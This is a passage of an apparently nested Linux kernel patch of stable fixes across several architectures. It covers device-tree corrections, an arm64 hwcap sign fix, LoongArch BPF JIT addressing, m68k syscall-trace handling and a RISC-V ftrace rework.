++		gpio-line-names = "lcd_reset", "lcd_pwr", "lcd_select",
++				  "backlight-enable", "Touch_shdwn",
++				  "LCD_H_pol", "lcd_V_pol";
++	};
+ };
+ 
+ &lvds0 {
+diff --git a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+index 03660476364f3..edcf6b2718814 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+@@ -306,7 +306,8 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 141 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 172 0>;
++		clocks = <&k3_clks 141 0>;
++		status = "disabled";
+ 	};
+ 
+ 	main_spi1: spi@20110000 {
+@@ -316,7 +317,8 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 142 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 173 0>;
++		clocks = <&k3_clks 142 0>;
++		status = "disabled";
+ 	};
+ 
+ 	main_spi2: spi@20120000 {
+@@ -326,7 +328,8 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 143 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 174 0>;
++		clocks = <&k3_clks 143 0>;
++		status = "disabled";
+ 	};
+ 
+ 	main_gpio_intr: interrupt-controller@a00000 {
+diff --git a/arch/arm64/boot/dts/ti/k3-am62-mcu.dtsi b/arch/arm64/boot/dts/ti/k3-am62-mcu.dtsi
+index f56c803560f26..df2d8f36a31bd 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62-mcu.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62-mcu.dtsi
+@@ -42,6 +42,7 @@
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 147 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 147 0>;
++		status = "disabled";
+ 	};
+ 
+ 	mcu_spi1: spi@4b10000 {
+@@ -52,6 +53,7 @@
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 148 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 148 0>;
++		status = "disabled";
+ 	};
+ 
+ 	mcu_gpio_intr: interrupt-controller@4210000 {
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+index 7e8552fd2b6ae..50009f963a324 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
++++ b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+@@ -80,7 +80,7 @@
+ 	};
+ };
+ 
+-&wkup_pmx0 {
++&wkup_pmx2 {
+ 	mcu_cpsw_pins_default: mcu-cpsw-pins-default {
+ 		pinctrl-single,pins = <
+ 			J721E_WKUP_IOPAD(0x0068, PIN_OUTPUT, 0) /* MCU_RGMII1_TX_CTL */
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+index d3fb86b2ea939..f04c6c890c33d 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+@@ -56,7 +56,34 @@
+ 	wkup_pmx0: pinctrl@4301c000 {
+ 		compatible = "pinctrl-single";
+ 		/* Proxy 0 addressing */
+-		reg = <0x00 0x4301c000 0x00 0x178>;
++		reg = <0x00 0x4301c000 0x00 0x34>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx1: pinctrl@0x4301c038 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c038 0x00 0x8>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx2: pinctrl@0x4301c068 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c068 0x00 0xec>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx3: pinctrl@0x4301c174 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c174 0x00 0x20>;
+ 		#pinctrl-cells = <1>;
+ 		pinctrl-single,register-width = <32>;
+ 		pinctrl-single,function-mask = <0xffffffff>;
+diff --git a/arch/arm64/boot/dts/xilinx/zynqmp.dtsi b/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
+index a549265e55f6e..7c1af75f33a05 100644
+--- a/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
++++ b/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
+@@ -825,6 +825,7 @@
+ 				clock-names = "bus_early", "ref";
+ 				iommus = <&smmu 0x860>;
+ 				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,resume-hs-terminations;
+ 				/* dma-coherent; */
+ 			};
+ 		};
+@@ -851,6 +852,7 @@
+ 				clock-names = "bus_early", "ref";
+ 				iommus = <&smmu 0x861>;
+ 				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,resume-hs-terminations;
+ 				/* dma-coherent; */
+ 			};
+ 		};
+diff --git a/arch/arm64/kernel/cpufeature.c b/arch/arm64/kernel/cpufeature.c
+index b3f37e2209ad3..86b2f7ec6c67e 100644
+--- a/arch/arm64/kernel/cpufeature.c
++++ b/arch/arm64/kernel/cpufeature.c
+@@ -2756,7 +2756,7 @@ static const struct arm64_cpu_capabilities arm64_elf_hwcaps[] = {
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_FP_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_FPHP),
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_AdvSIMD_SHIFT, 4, FTR_SIGNED, 0, CAP_HWCAP, KERNEL_HWCAP_ASIMD),
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_AdvSIMD_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_ASIMDHP),
+-	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_DIT_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DIT),
++	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_DIT_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DIT),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_DPB_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DCPOP),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_DPB_SHIFT, 4, FTR_UNSIGNED, 2, CAP_HWCAP, KERNEL_HWCAP_DCPODP),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_JSCVT_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_JSCVT),
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index bdcd0c7719a9e..2467bfb8889a9 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -782,7 +782,7 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 		if (ret < 0)
+ 			return ret;
+ 
+-		move_imm(ctx, t1, func_addr, is32);
++		move_addr(ctx, t1, func_addr);
+ 		emit_insn(ctx, jirl, t1, LOONGARCH_GPR_RA, 0);
+ 		move_reg(ctx, regmap[BPF_REG_0], LOONGARCH_GPR_A0);
+ 		break;
+diff --git a/arch/loongarch/net/bpf_jit.h b/arch/loongarch/net/bpf_jit.h
+index e665ddb0aeb85..093885539e701 100644
+--- a/arch/loongarch/net/bpf_jit.h
++++ b/arch/loongarch/net/bpf_jit.h
+@@ -80,6 +80,27 @@ static inline void emit_sext_32(struct jit_ctx *ctx, enum loongarch_gpr reg, boo
+ 	emit_insn(ctx, addiw, reg, reg, 0);
+ }
+ 
++static inline void move_addr(struct jit_ctx *ctx, enum loongarch_gpr rd, u64 addr)
++{
++	u64 imm_11_0, imm_31_12, imm_51_32, imm_63_52;
++
++	/* lu12iw rd, imm_31_12 */
++	imm_31_12 = (addr >> 12) & 0xfffff;
++	emit_insn(ctx, lu12iw, rd, imm_31_12);
++
++	/* ori rd, rd, imm_11_0 */
++	imm_11_0 = addr & 0xfff;
++	emit_insn(ctx, ori, rd, rd, imm_11_0);
++
++	/* lu32id rd, imm_51_32 */
++	imm_51_32 = (addr >> 32) & 0xfffff;
++	emit_insn(ctx, lu32id, rd, imm_51_32);
++
++	/* lu52id rd, rd, imm_63_52 */
++	imm_63_52 = (addr >> 52) & 0xfff;
++	emit_insn(ctx, lu52id, rd, rd, imm_63_52);
++}
++
+ static inline void move_imm(struct jit_ctx *ctx, enum loongarch_gpr rd, long imm, bool is32)
+ {
+ 	long imm_11_0, imm_31_12, imm_51_32, imm_63_52, imm_51_0, imm_51_31;
+diff --git a/arch/m68k/68000/entry.S b/arch/m68k/68000/entry.S
+index 997b549330156..7d63e2f1555a0 100644
+--- a/arch/m68k/68000/entry.S
++++ b/arch/m68k/68000/entry.S
+@@ -45,6 +45,8 @@ do_trace:
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0
++	jeq	ret_from_exception
+ 	movel	%sp@(PT_OFF_ORIG_D0),%d1
+ 	movel	#-ENOSYS,%d0
+ 	cmpl	#NR_syscalls,%d1
+diff --git a/arch/m68k/Kconfig.devices b/arch/m68k/Kconfig.devices
+index 6a87b4a5fcac2..e6e3efac18407 100644
+--- a/arch/m68k/Kconfig.devices
++++ b/arch/m68k/Kconfig.devices
+@@ -19,6 +19,7 @@ config HEARTBEAT
+ # We have a dedicated heartbeat LED. :-)
+ config PROC_HARDWARE
+ 	bool "/proc/hardware support"
++	depends on PROC_FS
+ 	help
+ 	  Say Y here to support the /proc/hardware file, which gives you
+ 	  access to information about the machine you're running on,
+diff --git a/arch/m68k/coldfire/entry.S b/arch/m68k/coldfire/entry.S
+index 9f337c70243a3..35104c5417ff4 100644
+--- a/arch/m68k/coldfire/entry.S
++++ b/arch/m68k/coldfire/entry.S
+@@ -90,6 +90,8 @@ ENTRY(system_call)
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0
++	jeq	ret_from_exception
+ 	movel	%d3,%a0
+ 	jbsr	%a0@
+ 	movel	%d0,%sp@(PT_OFF_D0)		/* save the return value */
+diff --git a/arch/m68k/kernel/entry.S b/arch/m68k/kernel/entry.S
+index 18f278bdbd218..42879e6eb651d 100644
+--- a/arch/m68k/kernel/entry.S
++++ b/arch/m68k/kernel/entry.S
+@@ -184,9 +184,12 @@ do_trace_entry:
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0			| optimization for cmpil #-1,%d0
++	jeq	ret_from_syscall
+ 	movel	%sp@(PT_OFF_ORIG_D0),%d0
+ 	cmpl	#NR_syscalls,%d0
+ 	jcs	syscall
++	jra	ret_from_syscall
+ badsys:
+ 	movel	#-ENOSYS,%sp@(PT_OFF_D0)
+ 	jra	ret_from_syscall
+diff --git a/arch/mips/boot/dts/ingenic/ci20.dts b/arch/mips/boot/dts/ingenic/ci20.dts
+index f38c39572a9e8..8f21d2304737c 100644
+--- a/arch/mips/boot/dts/ingenic/ci20.dts
++++ b/arch/mips/boot/dts/ingenic/ci20.dts
+@@ -113,7 +113,7 @@
+ 		regulator-min-microvolt = <5000000>;
+ 		regulator-max-microvolt = <5000000>;
+ 
+-		gpio = <&gpf 14 GPIO_ACTIVE_LOW>;
++		gpio = <&gpf 15 GPIO_ACTIVE_LOW>;
+ 		enable-active-high;
+ 	};
+ };
+diff --git a/arch/mips/include/asm/syscall.h b/arch/mips/include/asm/syscall.h
+index 25fa651c937d5..ebdf4d910af2f 100644
+--- a/arch/mips/include/asm/syscall.h
++++ b/arch/mips/include/asm/syscall.h
+@@ -38,7 +38,7 @@ static inline bool mips_syscall_is_indirect(struct task_struct *task,
+ static inline long syscall_get_nr(struct task_struct *task,
+ 				  struct pt_regs *regs)
+ {
+-	return current_thread_info()->syscall;
++	return task_thread_info(task)->syscall;
+ }
+ 
+ static inline void mips_syscall_update_nr(struct task_struct *task,
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index dc4cbf0a5ca95..4fd630efe39d3 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -90,7 +90,7 @@ aflags-$(CONFIG_CPU_LITTLE_ENDIAN)	+= -mlittle-endian
+ 
+ ifeq ($(HAS_BIARCH),y)
+ KBUILD_CFLAGS	+= -m$(BITS)
+-KBUILD_AFLAGS	+= -m$(BITS) -Wl,-a$(BITS)
++KBUILD_AFLAGS	+= -m$(BITS)
+ KBUILD_LDFLAGS	+= -m elf$(BITS)$(LDEMULATION)
+ endif
+ 
+diff --git a/arch/powerpc/mm/book3s64/radix_tlb.c b/arch/powerpc/mm/book3s64/radix_tlb.c
+index 4e29b619578c1..6d7a1ef723e69 100644
+--- a/arch/powerpc/mm/book3s64/radix_tlb.c
++++ b/arch/powerpc/mm/book3s64/radix_tlb.c
+@@ -1179,15 +1179,12 @@ static inline void __radix__flush_tlb_range(struct mm_struct *mm,
+ 			}
+ 		}
+ 	} else {
+-		bool hflush = false;
++		bool hflush;
+ 		unsigned long hstart, hend;
+ 
+-		if (IS_ENABLED(CONFIG_TRANSPARENT_HUGEPAGE)) {
+-			hstart = (start + PMD_SIZE - 1) & PMD_MASK;
+-			hend = end & PMD_MASK;
+-			if (hstart < hend)
+-				hflush = true;
+-		}
++		hstart = (start + PMD_SIZE - 1) & PMD_MASK;
++		hend = end & PMD_MASK;
++		hflush = IS_ENABLED(CONFIG_TRANSPARENT_HUGEPAGE) && hstart < hend;
+ 
+ 		if (type == FLUSH_TYPE_LOCAL) {
+ 			asm volatile("ptesync": : :"memory");
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index c8187867c5f47..ba8050e63acfb 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -11,7 +11,11 @@ LDFLAGS_vmlinux :=
+ ifeq ($(CONFIG_DYNAMIC_FTRACE),y)
+ 	LDFLAGS_vmlinux := --no-relax
+ 	KBUILD_CPPFLAGS += -DCC_USING_PATCHABLE_FUNCTION_ENTRY
+-	CC_FLAGS_FTRACE := -fpatchable-function-entry=8
++ifeq ($(CONFIG_RISCV_ISA_C),y)
++	CC_FLAGS_FTRACE := -fpatchable-function-entry=4
++else
++	CC_FLAGS_FTRACE := -fpatchable-function-entry=2
++endif
+ endif
+ 
+ ifeq ($(CONFIG_CMODEL_MEDLOW),y)
+diff --git a/arch/riscv/include/asm/ftrace.h b/arch/riscv/include/asm/ftrace.h
+index 04dad33800418..9e73922e1e2e5 100644
+--- a/arch/riscv/include/asm/ftrace.h
++++ b/arch/riscv/include/asm/ftrace.h
+@@ -42,6 +42,14 @@ struct dyn_arch_ftrace {
+  * 2) jalr: setting low-12 offset to ra, jump to ra, and set ra to
+  *          return address (original pc + 4)
+  *
++ *<ftrace enable>:
++ * 0: auipc  t0/ra, 0x?
++ * 4: jalr   t0/ra, ?(t0/ra)
++ *
++ *<ftrace disable>:
++ * 0: nop
++ * 4: nop
++ *
+  * Dynamic ftrace generates probes to call sites, so we must deal with
+  * both auipc and jalr at the same time.
+  */
+@@ -52,25 +60,43 @@ struct dyn_arch_ftrace {
+ #define AUIPC_OFFSET_MASK	(0xfffff000)
+ #define AUIPC_PAD		(0x00001000)
+ #define JALR_SHIFT		20
+-#define JALR_BASIC		(0x000080e7)
+-#define AUIPC_BASIC		(0x00000097)
++#define JALR_RA			(0x000080e7)
++#define AUIPC_RA		(0x00000097)
++#define JALR_T0			(0x000282e7)
++#define AUIPC_T0		(0x00000297)
+ #define NOP4			(0x00000013)
+ 
+-#define make_call(caller, callee, call)					\
++#define to_jalr_t0(offset)						\
++	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_T0)
++
++#define to_auipc_t0(offset)						\
++	((offset & JALR_SIGN_MASK) ?					\
++	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_T0) :	\
++	((offset & AUIPC_OFFSET_MASK) | AUIPC_T0))
++
++#define make_call_t0(caller, callee, call)				\
+ do {									\
+-	call[0] = to_auipc_insn((unsigned int)((unsigned long)callee -	\
+-				(unsigned long)caller));		\
+-	call[1] = to_jalr_insn((unsigned int)((unsigned long)callee -	\
+-			       (unsigned long)caller));			\
++	unsigned int offset =						\
++		(unsigned long) callee - (unsigned long) caller;	\
++	call[0] = to_auipc_t0(offset);					\
++	call[1] = to_jalr_t0(offset);					\
+ } while (0)
+ 
+-#define to_jalr_insn(offset)						\
+-	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_BASIC)
++#define to_jalr_ra(offset)						\
++	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_RA)
+ 
+-#define to_auipc_insn(offset)						\
++#define to_auipc_ra(offset)						\
+ 	((offset & JALR_SIGN_MASK) ?					\
+-	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_BASIC) :	\
+-	((offset & AUIPC_OFFSET_MASK) | AUIPC_BASIC))
++	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_RA) :	\
++	((offset & AUIPC_OFFSET_MASK) | AUIPC_RA))
++
++#define make_call_ra(caller, callee, call)				\
++do {									\
++	unsigned int offset =						\
++		(unsigned long) callee - (unsigned long) caller;	\
++	call[0] = to_auipc_ra(offset);					\
++	call[1] = to_jalr_ra(offset);					\
++} while (0)
+ 
+ /*
+  * Let auipc+jalr be the basic *mcount unit*, so we make it 8 bytes here.
+diff --git a/arch/riscv/include/asm/jump_label.h b/arch/riscv/include/asm/jump_label.h
+index 6d58bbb5da467..14a5ea8d8ef0f 100644
+--- a/arch/riscv/include/asm/jump_label.h
++++ b/arch/riscv/include/asm/jump_label.h
+@@ -18,6 +18,7 @@ static __always_inline bool arch_static_branch(struct static_key * const key,
+ 					       const bool branch)
+ {
+ 	asm_volatile_goto(
++		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+ 		"	.option norvc				\n\t"
+@@ -39,6 +40,7 @@ static __always_inline bool arch_static_branch_jump(struct static_key * const ke
+ 						    const bool branch)
+ {
+ 	asm_volatile_goto(
++		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+ 		"	.option norvc				\n\t"
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index ec6fb83349ced..92ec2d9d7273f 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -415,7 +415,7 @@ static inline void update_mmu_cache(struct vm_area_struct *vma,
+ 	 * Relying on flush_tlb_fix_spurious_fault would suffice, but
+ 	 * the extra traps reduce performance.  So, eagerly SFENCE.VMA.
+ 	 */
+-	flush_tlb_page(vma, address);
++	local_flush_tlb_page(address);
+ }
+ 
+ static inline void update_mmu_cache_pmd(struct vm_area_struct *vma,
+diff --git a/arch/riscv/include/asm/thread_info.h b/arch/riscv/include/asm/thread_info.h
+index 67322f878e0d7..f704c8dd57e04 100644
+--- a/arch/riscv/include/asm/thread_info.h
++++ b/arch/riscv/include/asm/thread_info.h
+@@ -43,6 +43,7 @@
+ #ifndef __ASSEMBLY__
+ 
+ extern long shadow_stack[SHADOW_OVERFLOW_STACK_SIZE / sizeof(long)];
++extern unsigned long spin_shadow_stack;
+ 
+ #include <asm/processor.h>
+ #include <asm/csr.h>
+diff --git a/arch/riscv/kernel/ftrace.c b/arch/riscv/kernel/ftrace.c
+index 2086f65857737..5bff37af4770b 100644
+--- a/arch/riscv/kernel/ftrace.c
++++ b/arch/riscv/kernel/ftrace.c
+@@ -55,12 +55,15 @@ static int ftrace_check_current_call(unsigned long hook_pos,
+ }
+ 
+ static int __ftrace_modify_call(unsigned long hook_pos, unsigned long target,
+-				bool enable)
++				bool enable, bool ra)
+ {
+ 	unsigned int call[2];
+ 	unsigned int nops[2] = {NOP4, NOP4};
+ 
+-	make_call(hook_pos, target, call);
++	if (ra)
++		make_call_ra(hook_pos, target, call);
++	else
++		make_call_t0(hook_pos, target, call);
+ 
+ 	/* Replace the auipc-jalr pair at once. Return -EPERM on write error. */
+ 	if (patch_text_nosync
+@@ -70,42 +73,13 @@ static int __ftrace_modify_call(unsigned long hook_pos, unsigned long target,
+ 	return 0;
+ }
+ 
+-/*
+- * Put 5 instructions with 16 bytes at the front of function within
+- * patchable function entry nops' area.
+- *
+- * 0: REG_S  ra, -SZREG(sp)
+- * 1: auipc  ra, 0x?
+- * 2: jalr   -?(ra)
+- * 3: REG_L  ra, -SZREG(sp)
+- *
+- * So the opcodes is:
+- * 0: 0xfe113c23 (sd)/0xfe112e23 (sw)
+- * 1: 0x???????? -> auipc
+- * 2: 0x???????? -> jalr
+- * 3: 0xff813083 (ld)/0xffc12083 (lw)
+- */
+-#if __riscv_xlen == 64
+-#define INSN0	0xfe113c23
+-#define INSN3	0xff813083
+-#elif __riscv_xlen == 32
+-#define INSN0	0xfe112e23
+-#define INSN3	0xffc12083
+-#endif
+-
+-#define FUNC_ENTRY_SIZE	16
+-#define FUNC_ENTRY_JMP	4
+-
+ int ftrace_make_call(struct dyn_ftrace *rec, unsigned long addr)
+ {
+-	unsigned int call[4] = {INSN0, 0, 0, INSN3};
+-	unsigned long target = addr;
+-	unsigned long caller = rec->ip + FUNC_ENTRY_JMP;
++	unsigned int call[2];
+ 
+-	call[1] = to_auipc_insn((unsigned int)(target - caller));
+-	call[2] = to_jalr_insn((unsigned int)(target - caller));
++	make_call_t0(rec->ip, addr, call);
+ 
+-	if (patch_text_nosync((void *)rec->ip, call, FUNC_ENTRY_SIZE))
++	if (patch_text_nosync((void *)rec->ip, call, MCOUNT_INSN_SIZE))
+ 		return -EPERM;
+ 
+ 	return 0;
+@@ -114,15 +88,14 @@ int ftrace_make_call(struct dyn_ftrace *rec, unsigned long addr)
+ int ftrace_make_nop(struct module *mod, struct dyn_ftrace *rec,
+ 		    unsigned long addr)
+ {
+-	unsigned int nops[4] = {NOP4, NOP4, NOP4, NOP4};
++	unsigned int nops[2] = {NOP4, NOP4};
+ 
+-	if (patch_text_nosync((void *)rec->ip, nops, FUNC_ENTRY_SIZE))
++	if (patch_text_nosync((void *)rec->ip, nops, MCOUNT_INSN_SIZE))
+ 		return -EPERM;
+ 
+ 	return 0;
+ }
+ 
+-
+ /*
+  * This is called early on, and isn't wrapped by
+  * ftrace_arch_code_modify_{prepare,post_process}() and therefor doesn't hold
+@@ -144,10 +117,10 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec)
+ int ftrace_update_ftrace_func(ftrace_func_t func)
+ {
+ 	int ret = __ftrace_modify_call((unsigned long)&ftrace_call,
+-				       (unsigned long)func, true);
++				       (unsigned long)func, true, true);
+ 	if (!ret) {
+ 		ret = __ftrace_modify_call((unsigned long)&ftrace_regs_call,
+-					   (unsigned long)func, true);
++					   (unsigned long)func, true, true);
+ 	}
+ 
+ 	return ret;
+@@ -159,16 +132,16 @@ int ftrace_modify_call(struct dyn_ftrace *rec, unsigned long old_addr,
+ 		       unsigned long addr)
+ {
+ 	unsigned int call[2];
+-	unsigned long caller = rec->ip + FUNC_ENTRY_JMP;
++	unsigned long caller = rec->ip;
+ 	int ret;
+ 
+-	make_call(caller, old_addr, call);
++	make_call_t0(caller, old_addr, call);
+ 	ret = ftrace_check_current_call(caller, call);
+ 
+ 	if (ret)
+ 		return ret;
+ 
+-	return __ftrace_modify_call(caller, addr, true);
++	return __ftrace_modify_call(caller, addr, true, false);
+ }
+ #endif
+ 
+@@ -203,12 +176,12 @@ int ftrace_enable_ftrace_graph_caller(void)
+ 	int ret;
+ 
+ 	ret = __ftrace_modify_call((unsigned long)&ftrace_graph_call,
+-				    (unsigned long)&prepare_ftrace_return, true);
++				    (unsigned long)&prepare_ftrace_return, true, true);
+ 	if (ret)
+ 		return ret;
+ 
+ 	return __ftrace_modify_call((unsigned long)&ftrace_graph_regs_call,
+-				    (unsigned long)&prepare_ftrace_return, true);
++				    (unsigned long)&prepare_ftrace_return, true, true);
+ }
+ 
+ int ftrace_disable_ftrace_graph_caller(void)
+@@ -216,12 +189,12 @@ int ftrace_disable_ftrace_graph_caller(void)
+ 	int ret;
+ 
+ 	ret = __ftrace_modify_call((unsigned long)&ftrace_graph_call,
+-				    (unsigned long)&prepare_ftrace_return, false);
++				    (unsigned long)&prepare_ftrace_return, false, true);
+ 	if (ret)
+ 		return ret;
+ 
+ 	return __ftrace_modify_call((unsigned long)&ftrace_graph_regs_call,
+-				    (unsigned long)&prepare_ftrace_return, false);
++				    (unsigned long)&prepare_ftrace_return, false, true);
+ }
+ #endif /* CONFIG_DYNAMIC_FTRACE */
+ #endif /* CONFIG_FUNCTION_GRAPH_TRACER */
+diff --git a/arch/riscv/kernel/mcount-dyn.S b/arch/riscv/kernel/mcount-dyn.S
+index d171eca623b6f..125de818d1bab 100644
+--- a/arch/riscv/kernel/mcount-dyn.S
++++ b/arch/riscv/kernel/mcount-dyn.S
+@@ -13,8 +13,8 @@
+ 
+ 	.text
+ 
+-#define FENTRY_RA_OFFSET	12
+-#define ABI_SIZE_ON_STACK	72
++#define FENTRY_RA_OFFSET	8
++#define ABI_SIZE_ON_STACK	80
+ #define ABI_A0			0
+ #define ABI_A1			8
+ #define ABI_A2			16
+@@ -23,10 +23,10 @@
+ #define ABI_A5			40
+ #define ABI_A6			48
+ #define ABI_A7			56
+-#define ABI_RA			64
++#define ABI_T0			64
++#define ABI_RA			72
+ 
+ 	.macro SAVE_ABI
+-	addi	sp, sp, -SZREG
+ 	addi	sp, sp, -ABI_SIZE_ON_STACK
+ 
+ 	REG_S	a0, ABI_A0(sp)
+@@ -37,6 +37,7 @@
+ 	REG_S	a5, ABI_A5(sp)
+ 	REG_S	a6, ABI_A6(sp)
+ 	REG_S	a7, ABI_A7(sp)
++	REG_S	t0, ABI_T0(sp)
+ 	REG_S	ra, ABI_RA(sp)
+ 	.endm
+ 
+@@ -49,24 +50,18 @@
+ 	REG_L	a5, ABI_A5(sp)
+ 	REG_L	a6, ABI_A6(sp)
+ 	REG_L	a7, ABI_A7(sp)
++	REG_L	t0, ABI_T0(sp)
+ 	REG_L	ra, ABI_RA(sp)
+ 
+ 	addi	sp, sp, ABI_SIZE_ON_STACK
+-	addi	sp, sp, SZREG
+ 	.endm
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE_WITH_REGS
+ 	.macro SAVE_ALL
+-	addi	sp, sp, -SZREG
+ 	addi	sp, sp, -PT_SIZE_ON_STACK
+ 
+-	REG_S x1,  PT_EPC(sp)
+-	addi	sp, sp, PT_SIZE_ON_STACK
+-	REG_L x1,  (sp)
+-	addi	sp, sp, -PT_SIZE_ON_STACK
++	REG_S t0,  PT_EPC(sp)
+ 	REG_S x1,  PT_RA(sp)
+-	REG_L x1,  PT_EPC(sp)
+-
+ 	REG_S x2,  PT_SP(sp)
+ 	REG_S x3,  PT_GP(sp)
+ 	REG_S x4,  PT_TP(sp)
+@@ -100,15 +95,11 @@
+ 	.endm
+ 
+ 	.macro RESTORE_ALL
++	REG_L t0,  PT_EPC(sp)
+ 	REG_L x1,  PT_RA(sp)
+-	addi	sp, sp, PT_SIZE_ON_STACK
+-	REG_S x1,  (sp)
+-	addi	sp, sp, -PT_SIZE_ON_STACK
+-	REG_L x1,  PT_EPC(sp)
+ 	REG_L x2,  PT_SP(sp)
+ 	REG_L x3,  PT_GP(sp)
+ 	REG_L x4,  PT_TP(sp)
+-	REG_L x5,  PT_T0(sp)
+ 	REG_L x6,  PT_T1(sp)
+ 	REG_L x7,  PT_T2(sp)
+ 	REG_L x8,  PT_S0(sp)
+@@ -137,17 +128,16 @@
+ 	REG_L x31, PT_T6(sp)
+ 
+ 	addi	sp, sp, PT_SIZE_ON_STACK
+-	addi	sp, sp, SZREG
+ 	.endm
+ #endif /* CONFIG_DYNAMIC_FTRACE_WITH_REGS */
+ 
+ ENTRY(ftrace_caller)
+ 	SAVE_ABI
+ 
+-	addi	a0, ra, -FENTRY_RA_OFFSET
++	addi	a0, t0, -FENTRY_RA_OFFSET
+ 	la	a1, function_trace_op
+ 	REG_L	a2, 0(a1)
+-	REG_L	a1, ABI_SIZE_ON_STACK(sp)
++	mv	a1, ra
+ 	mv	a3, sp
+ 
+ ftrace_call:
+@@ -155,8 +145,8 @@ ftrace_call:
+ 	call	ftrace_stub
+ 
+ #ifdef CONFIG_FUNCTION_GRAPH_TRACER
+-	addi	a0, sp, ABI_SIZE_ON_STACK
+-	REG_L	a1, ABI_RA(sp)
++	addi	a0, sp, ABI_RA
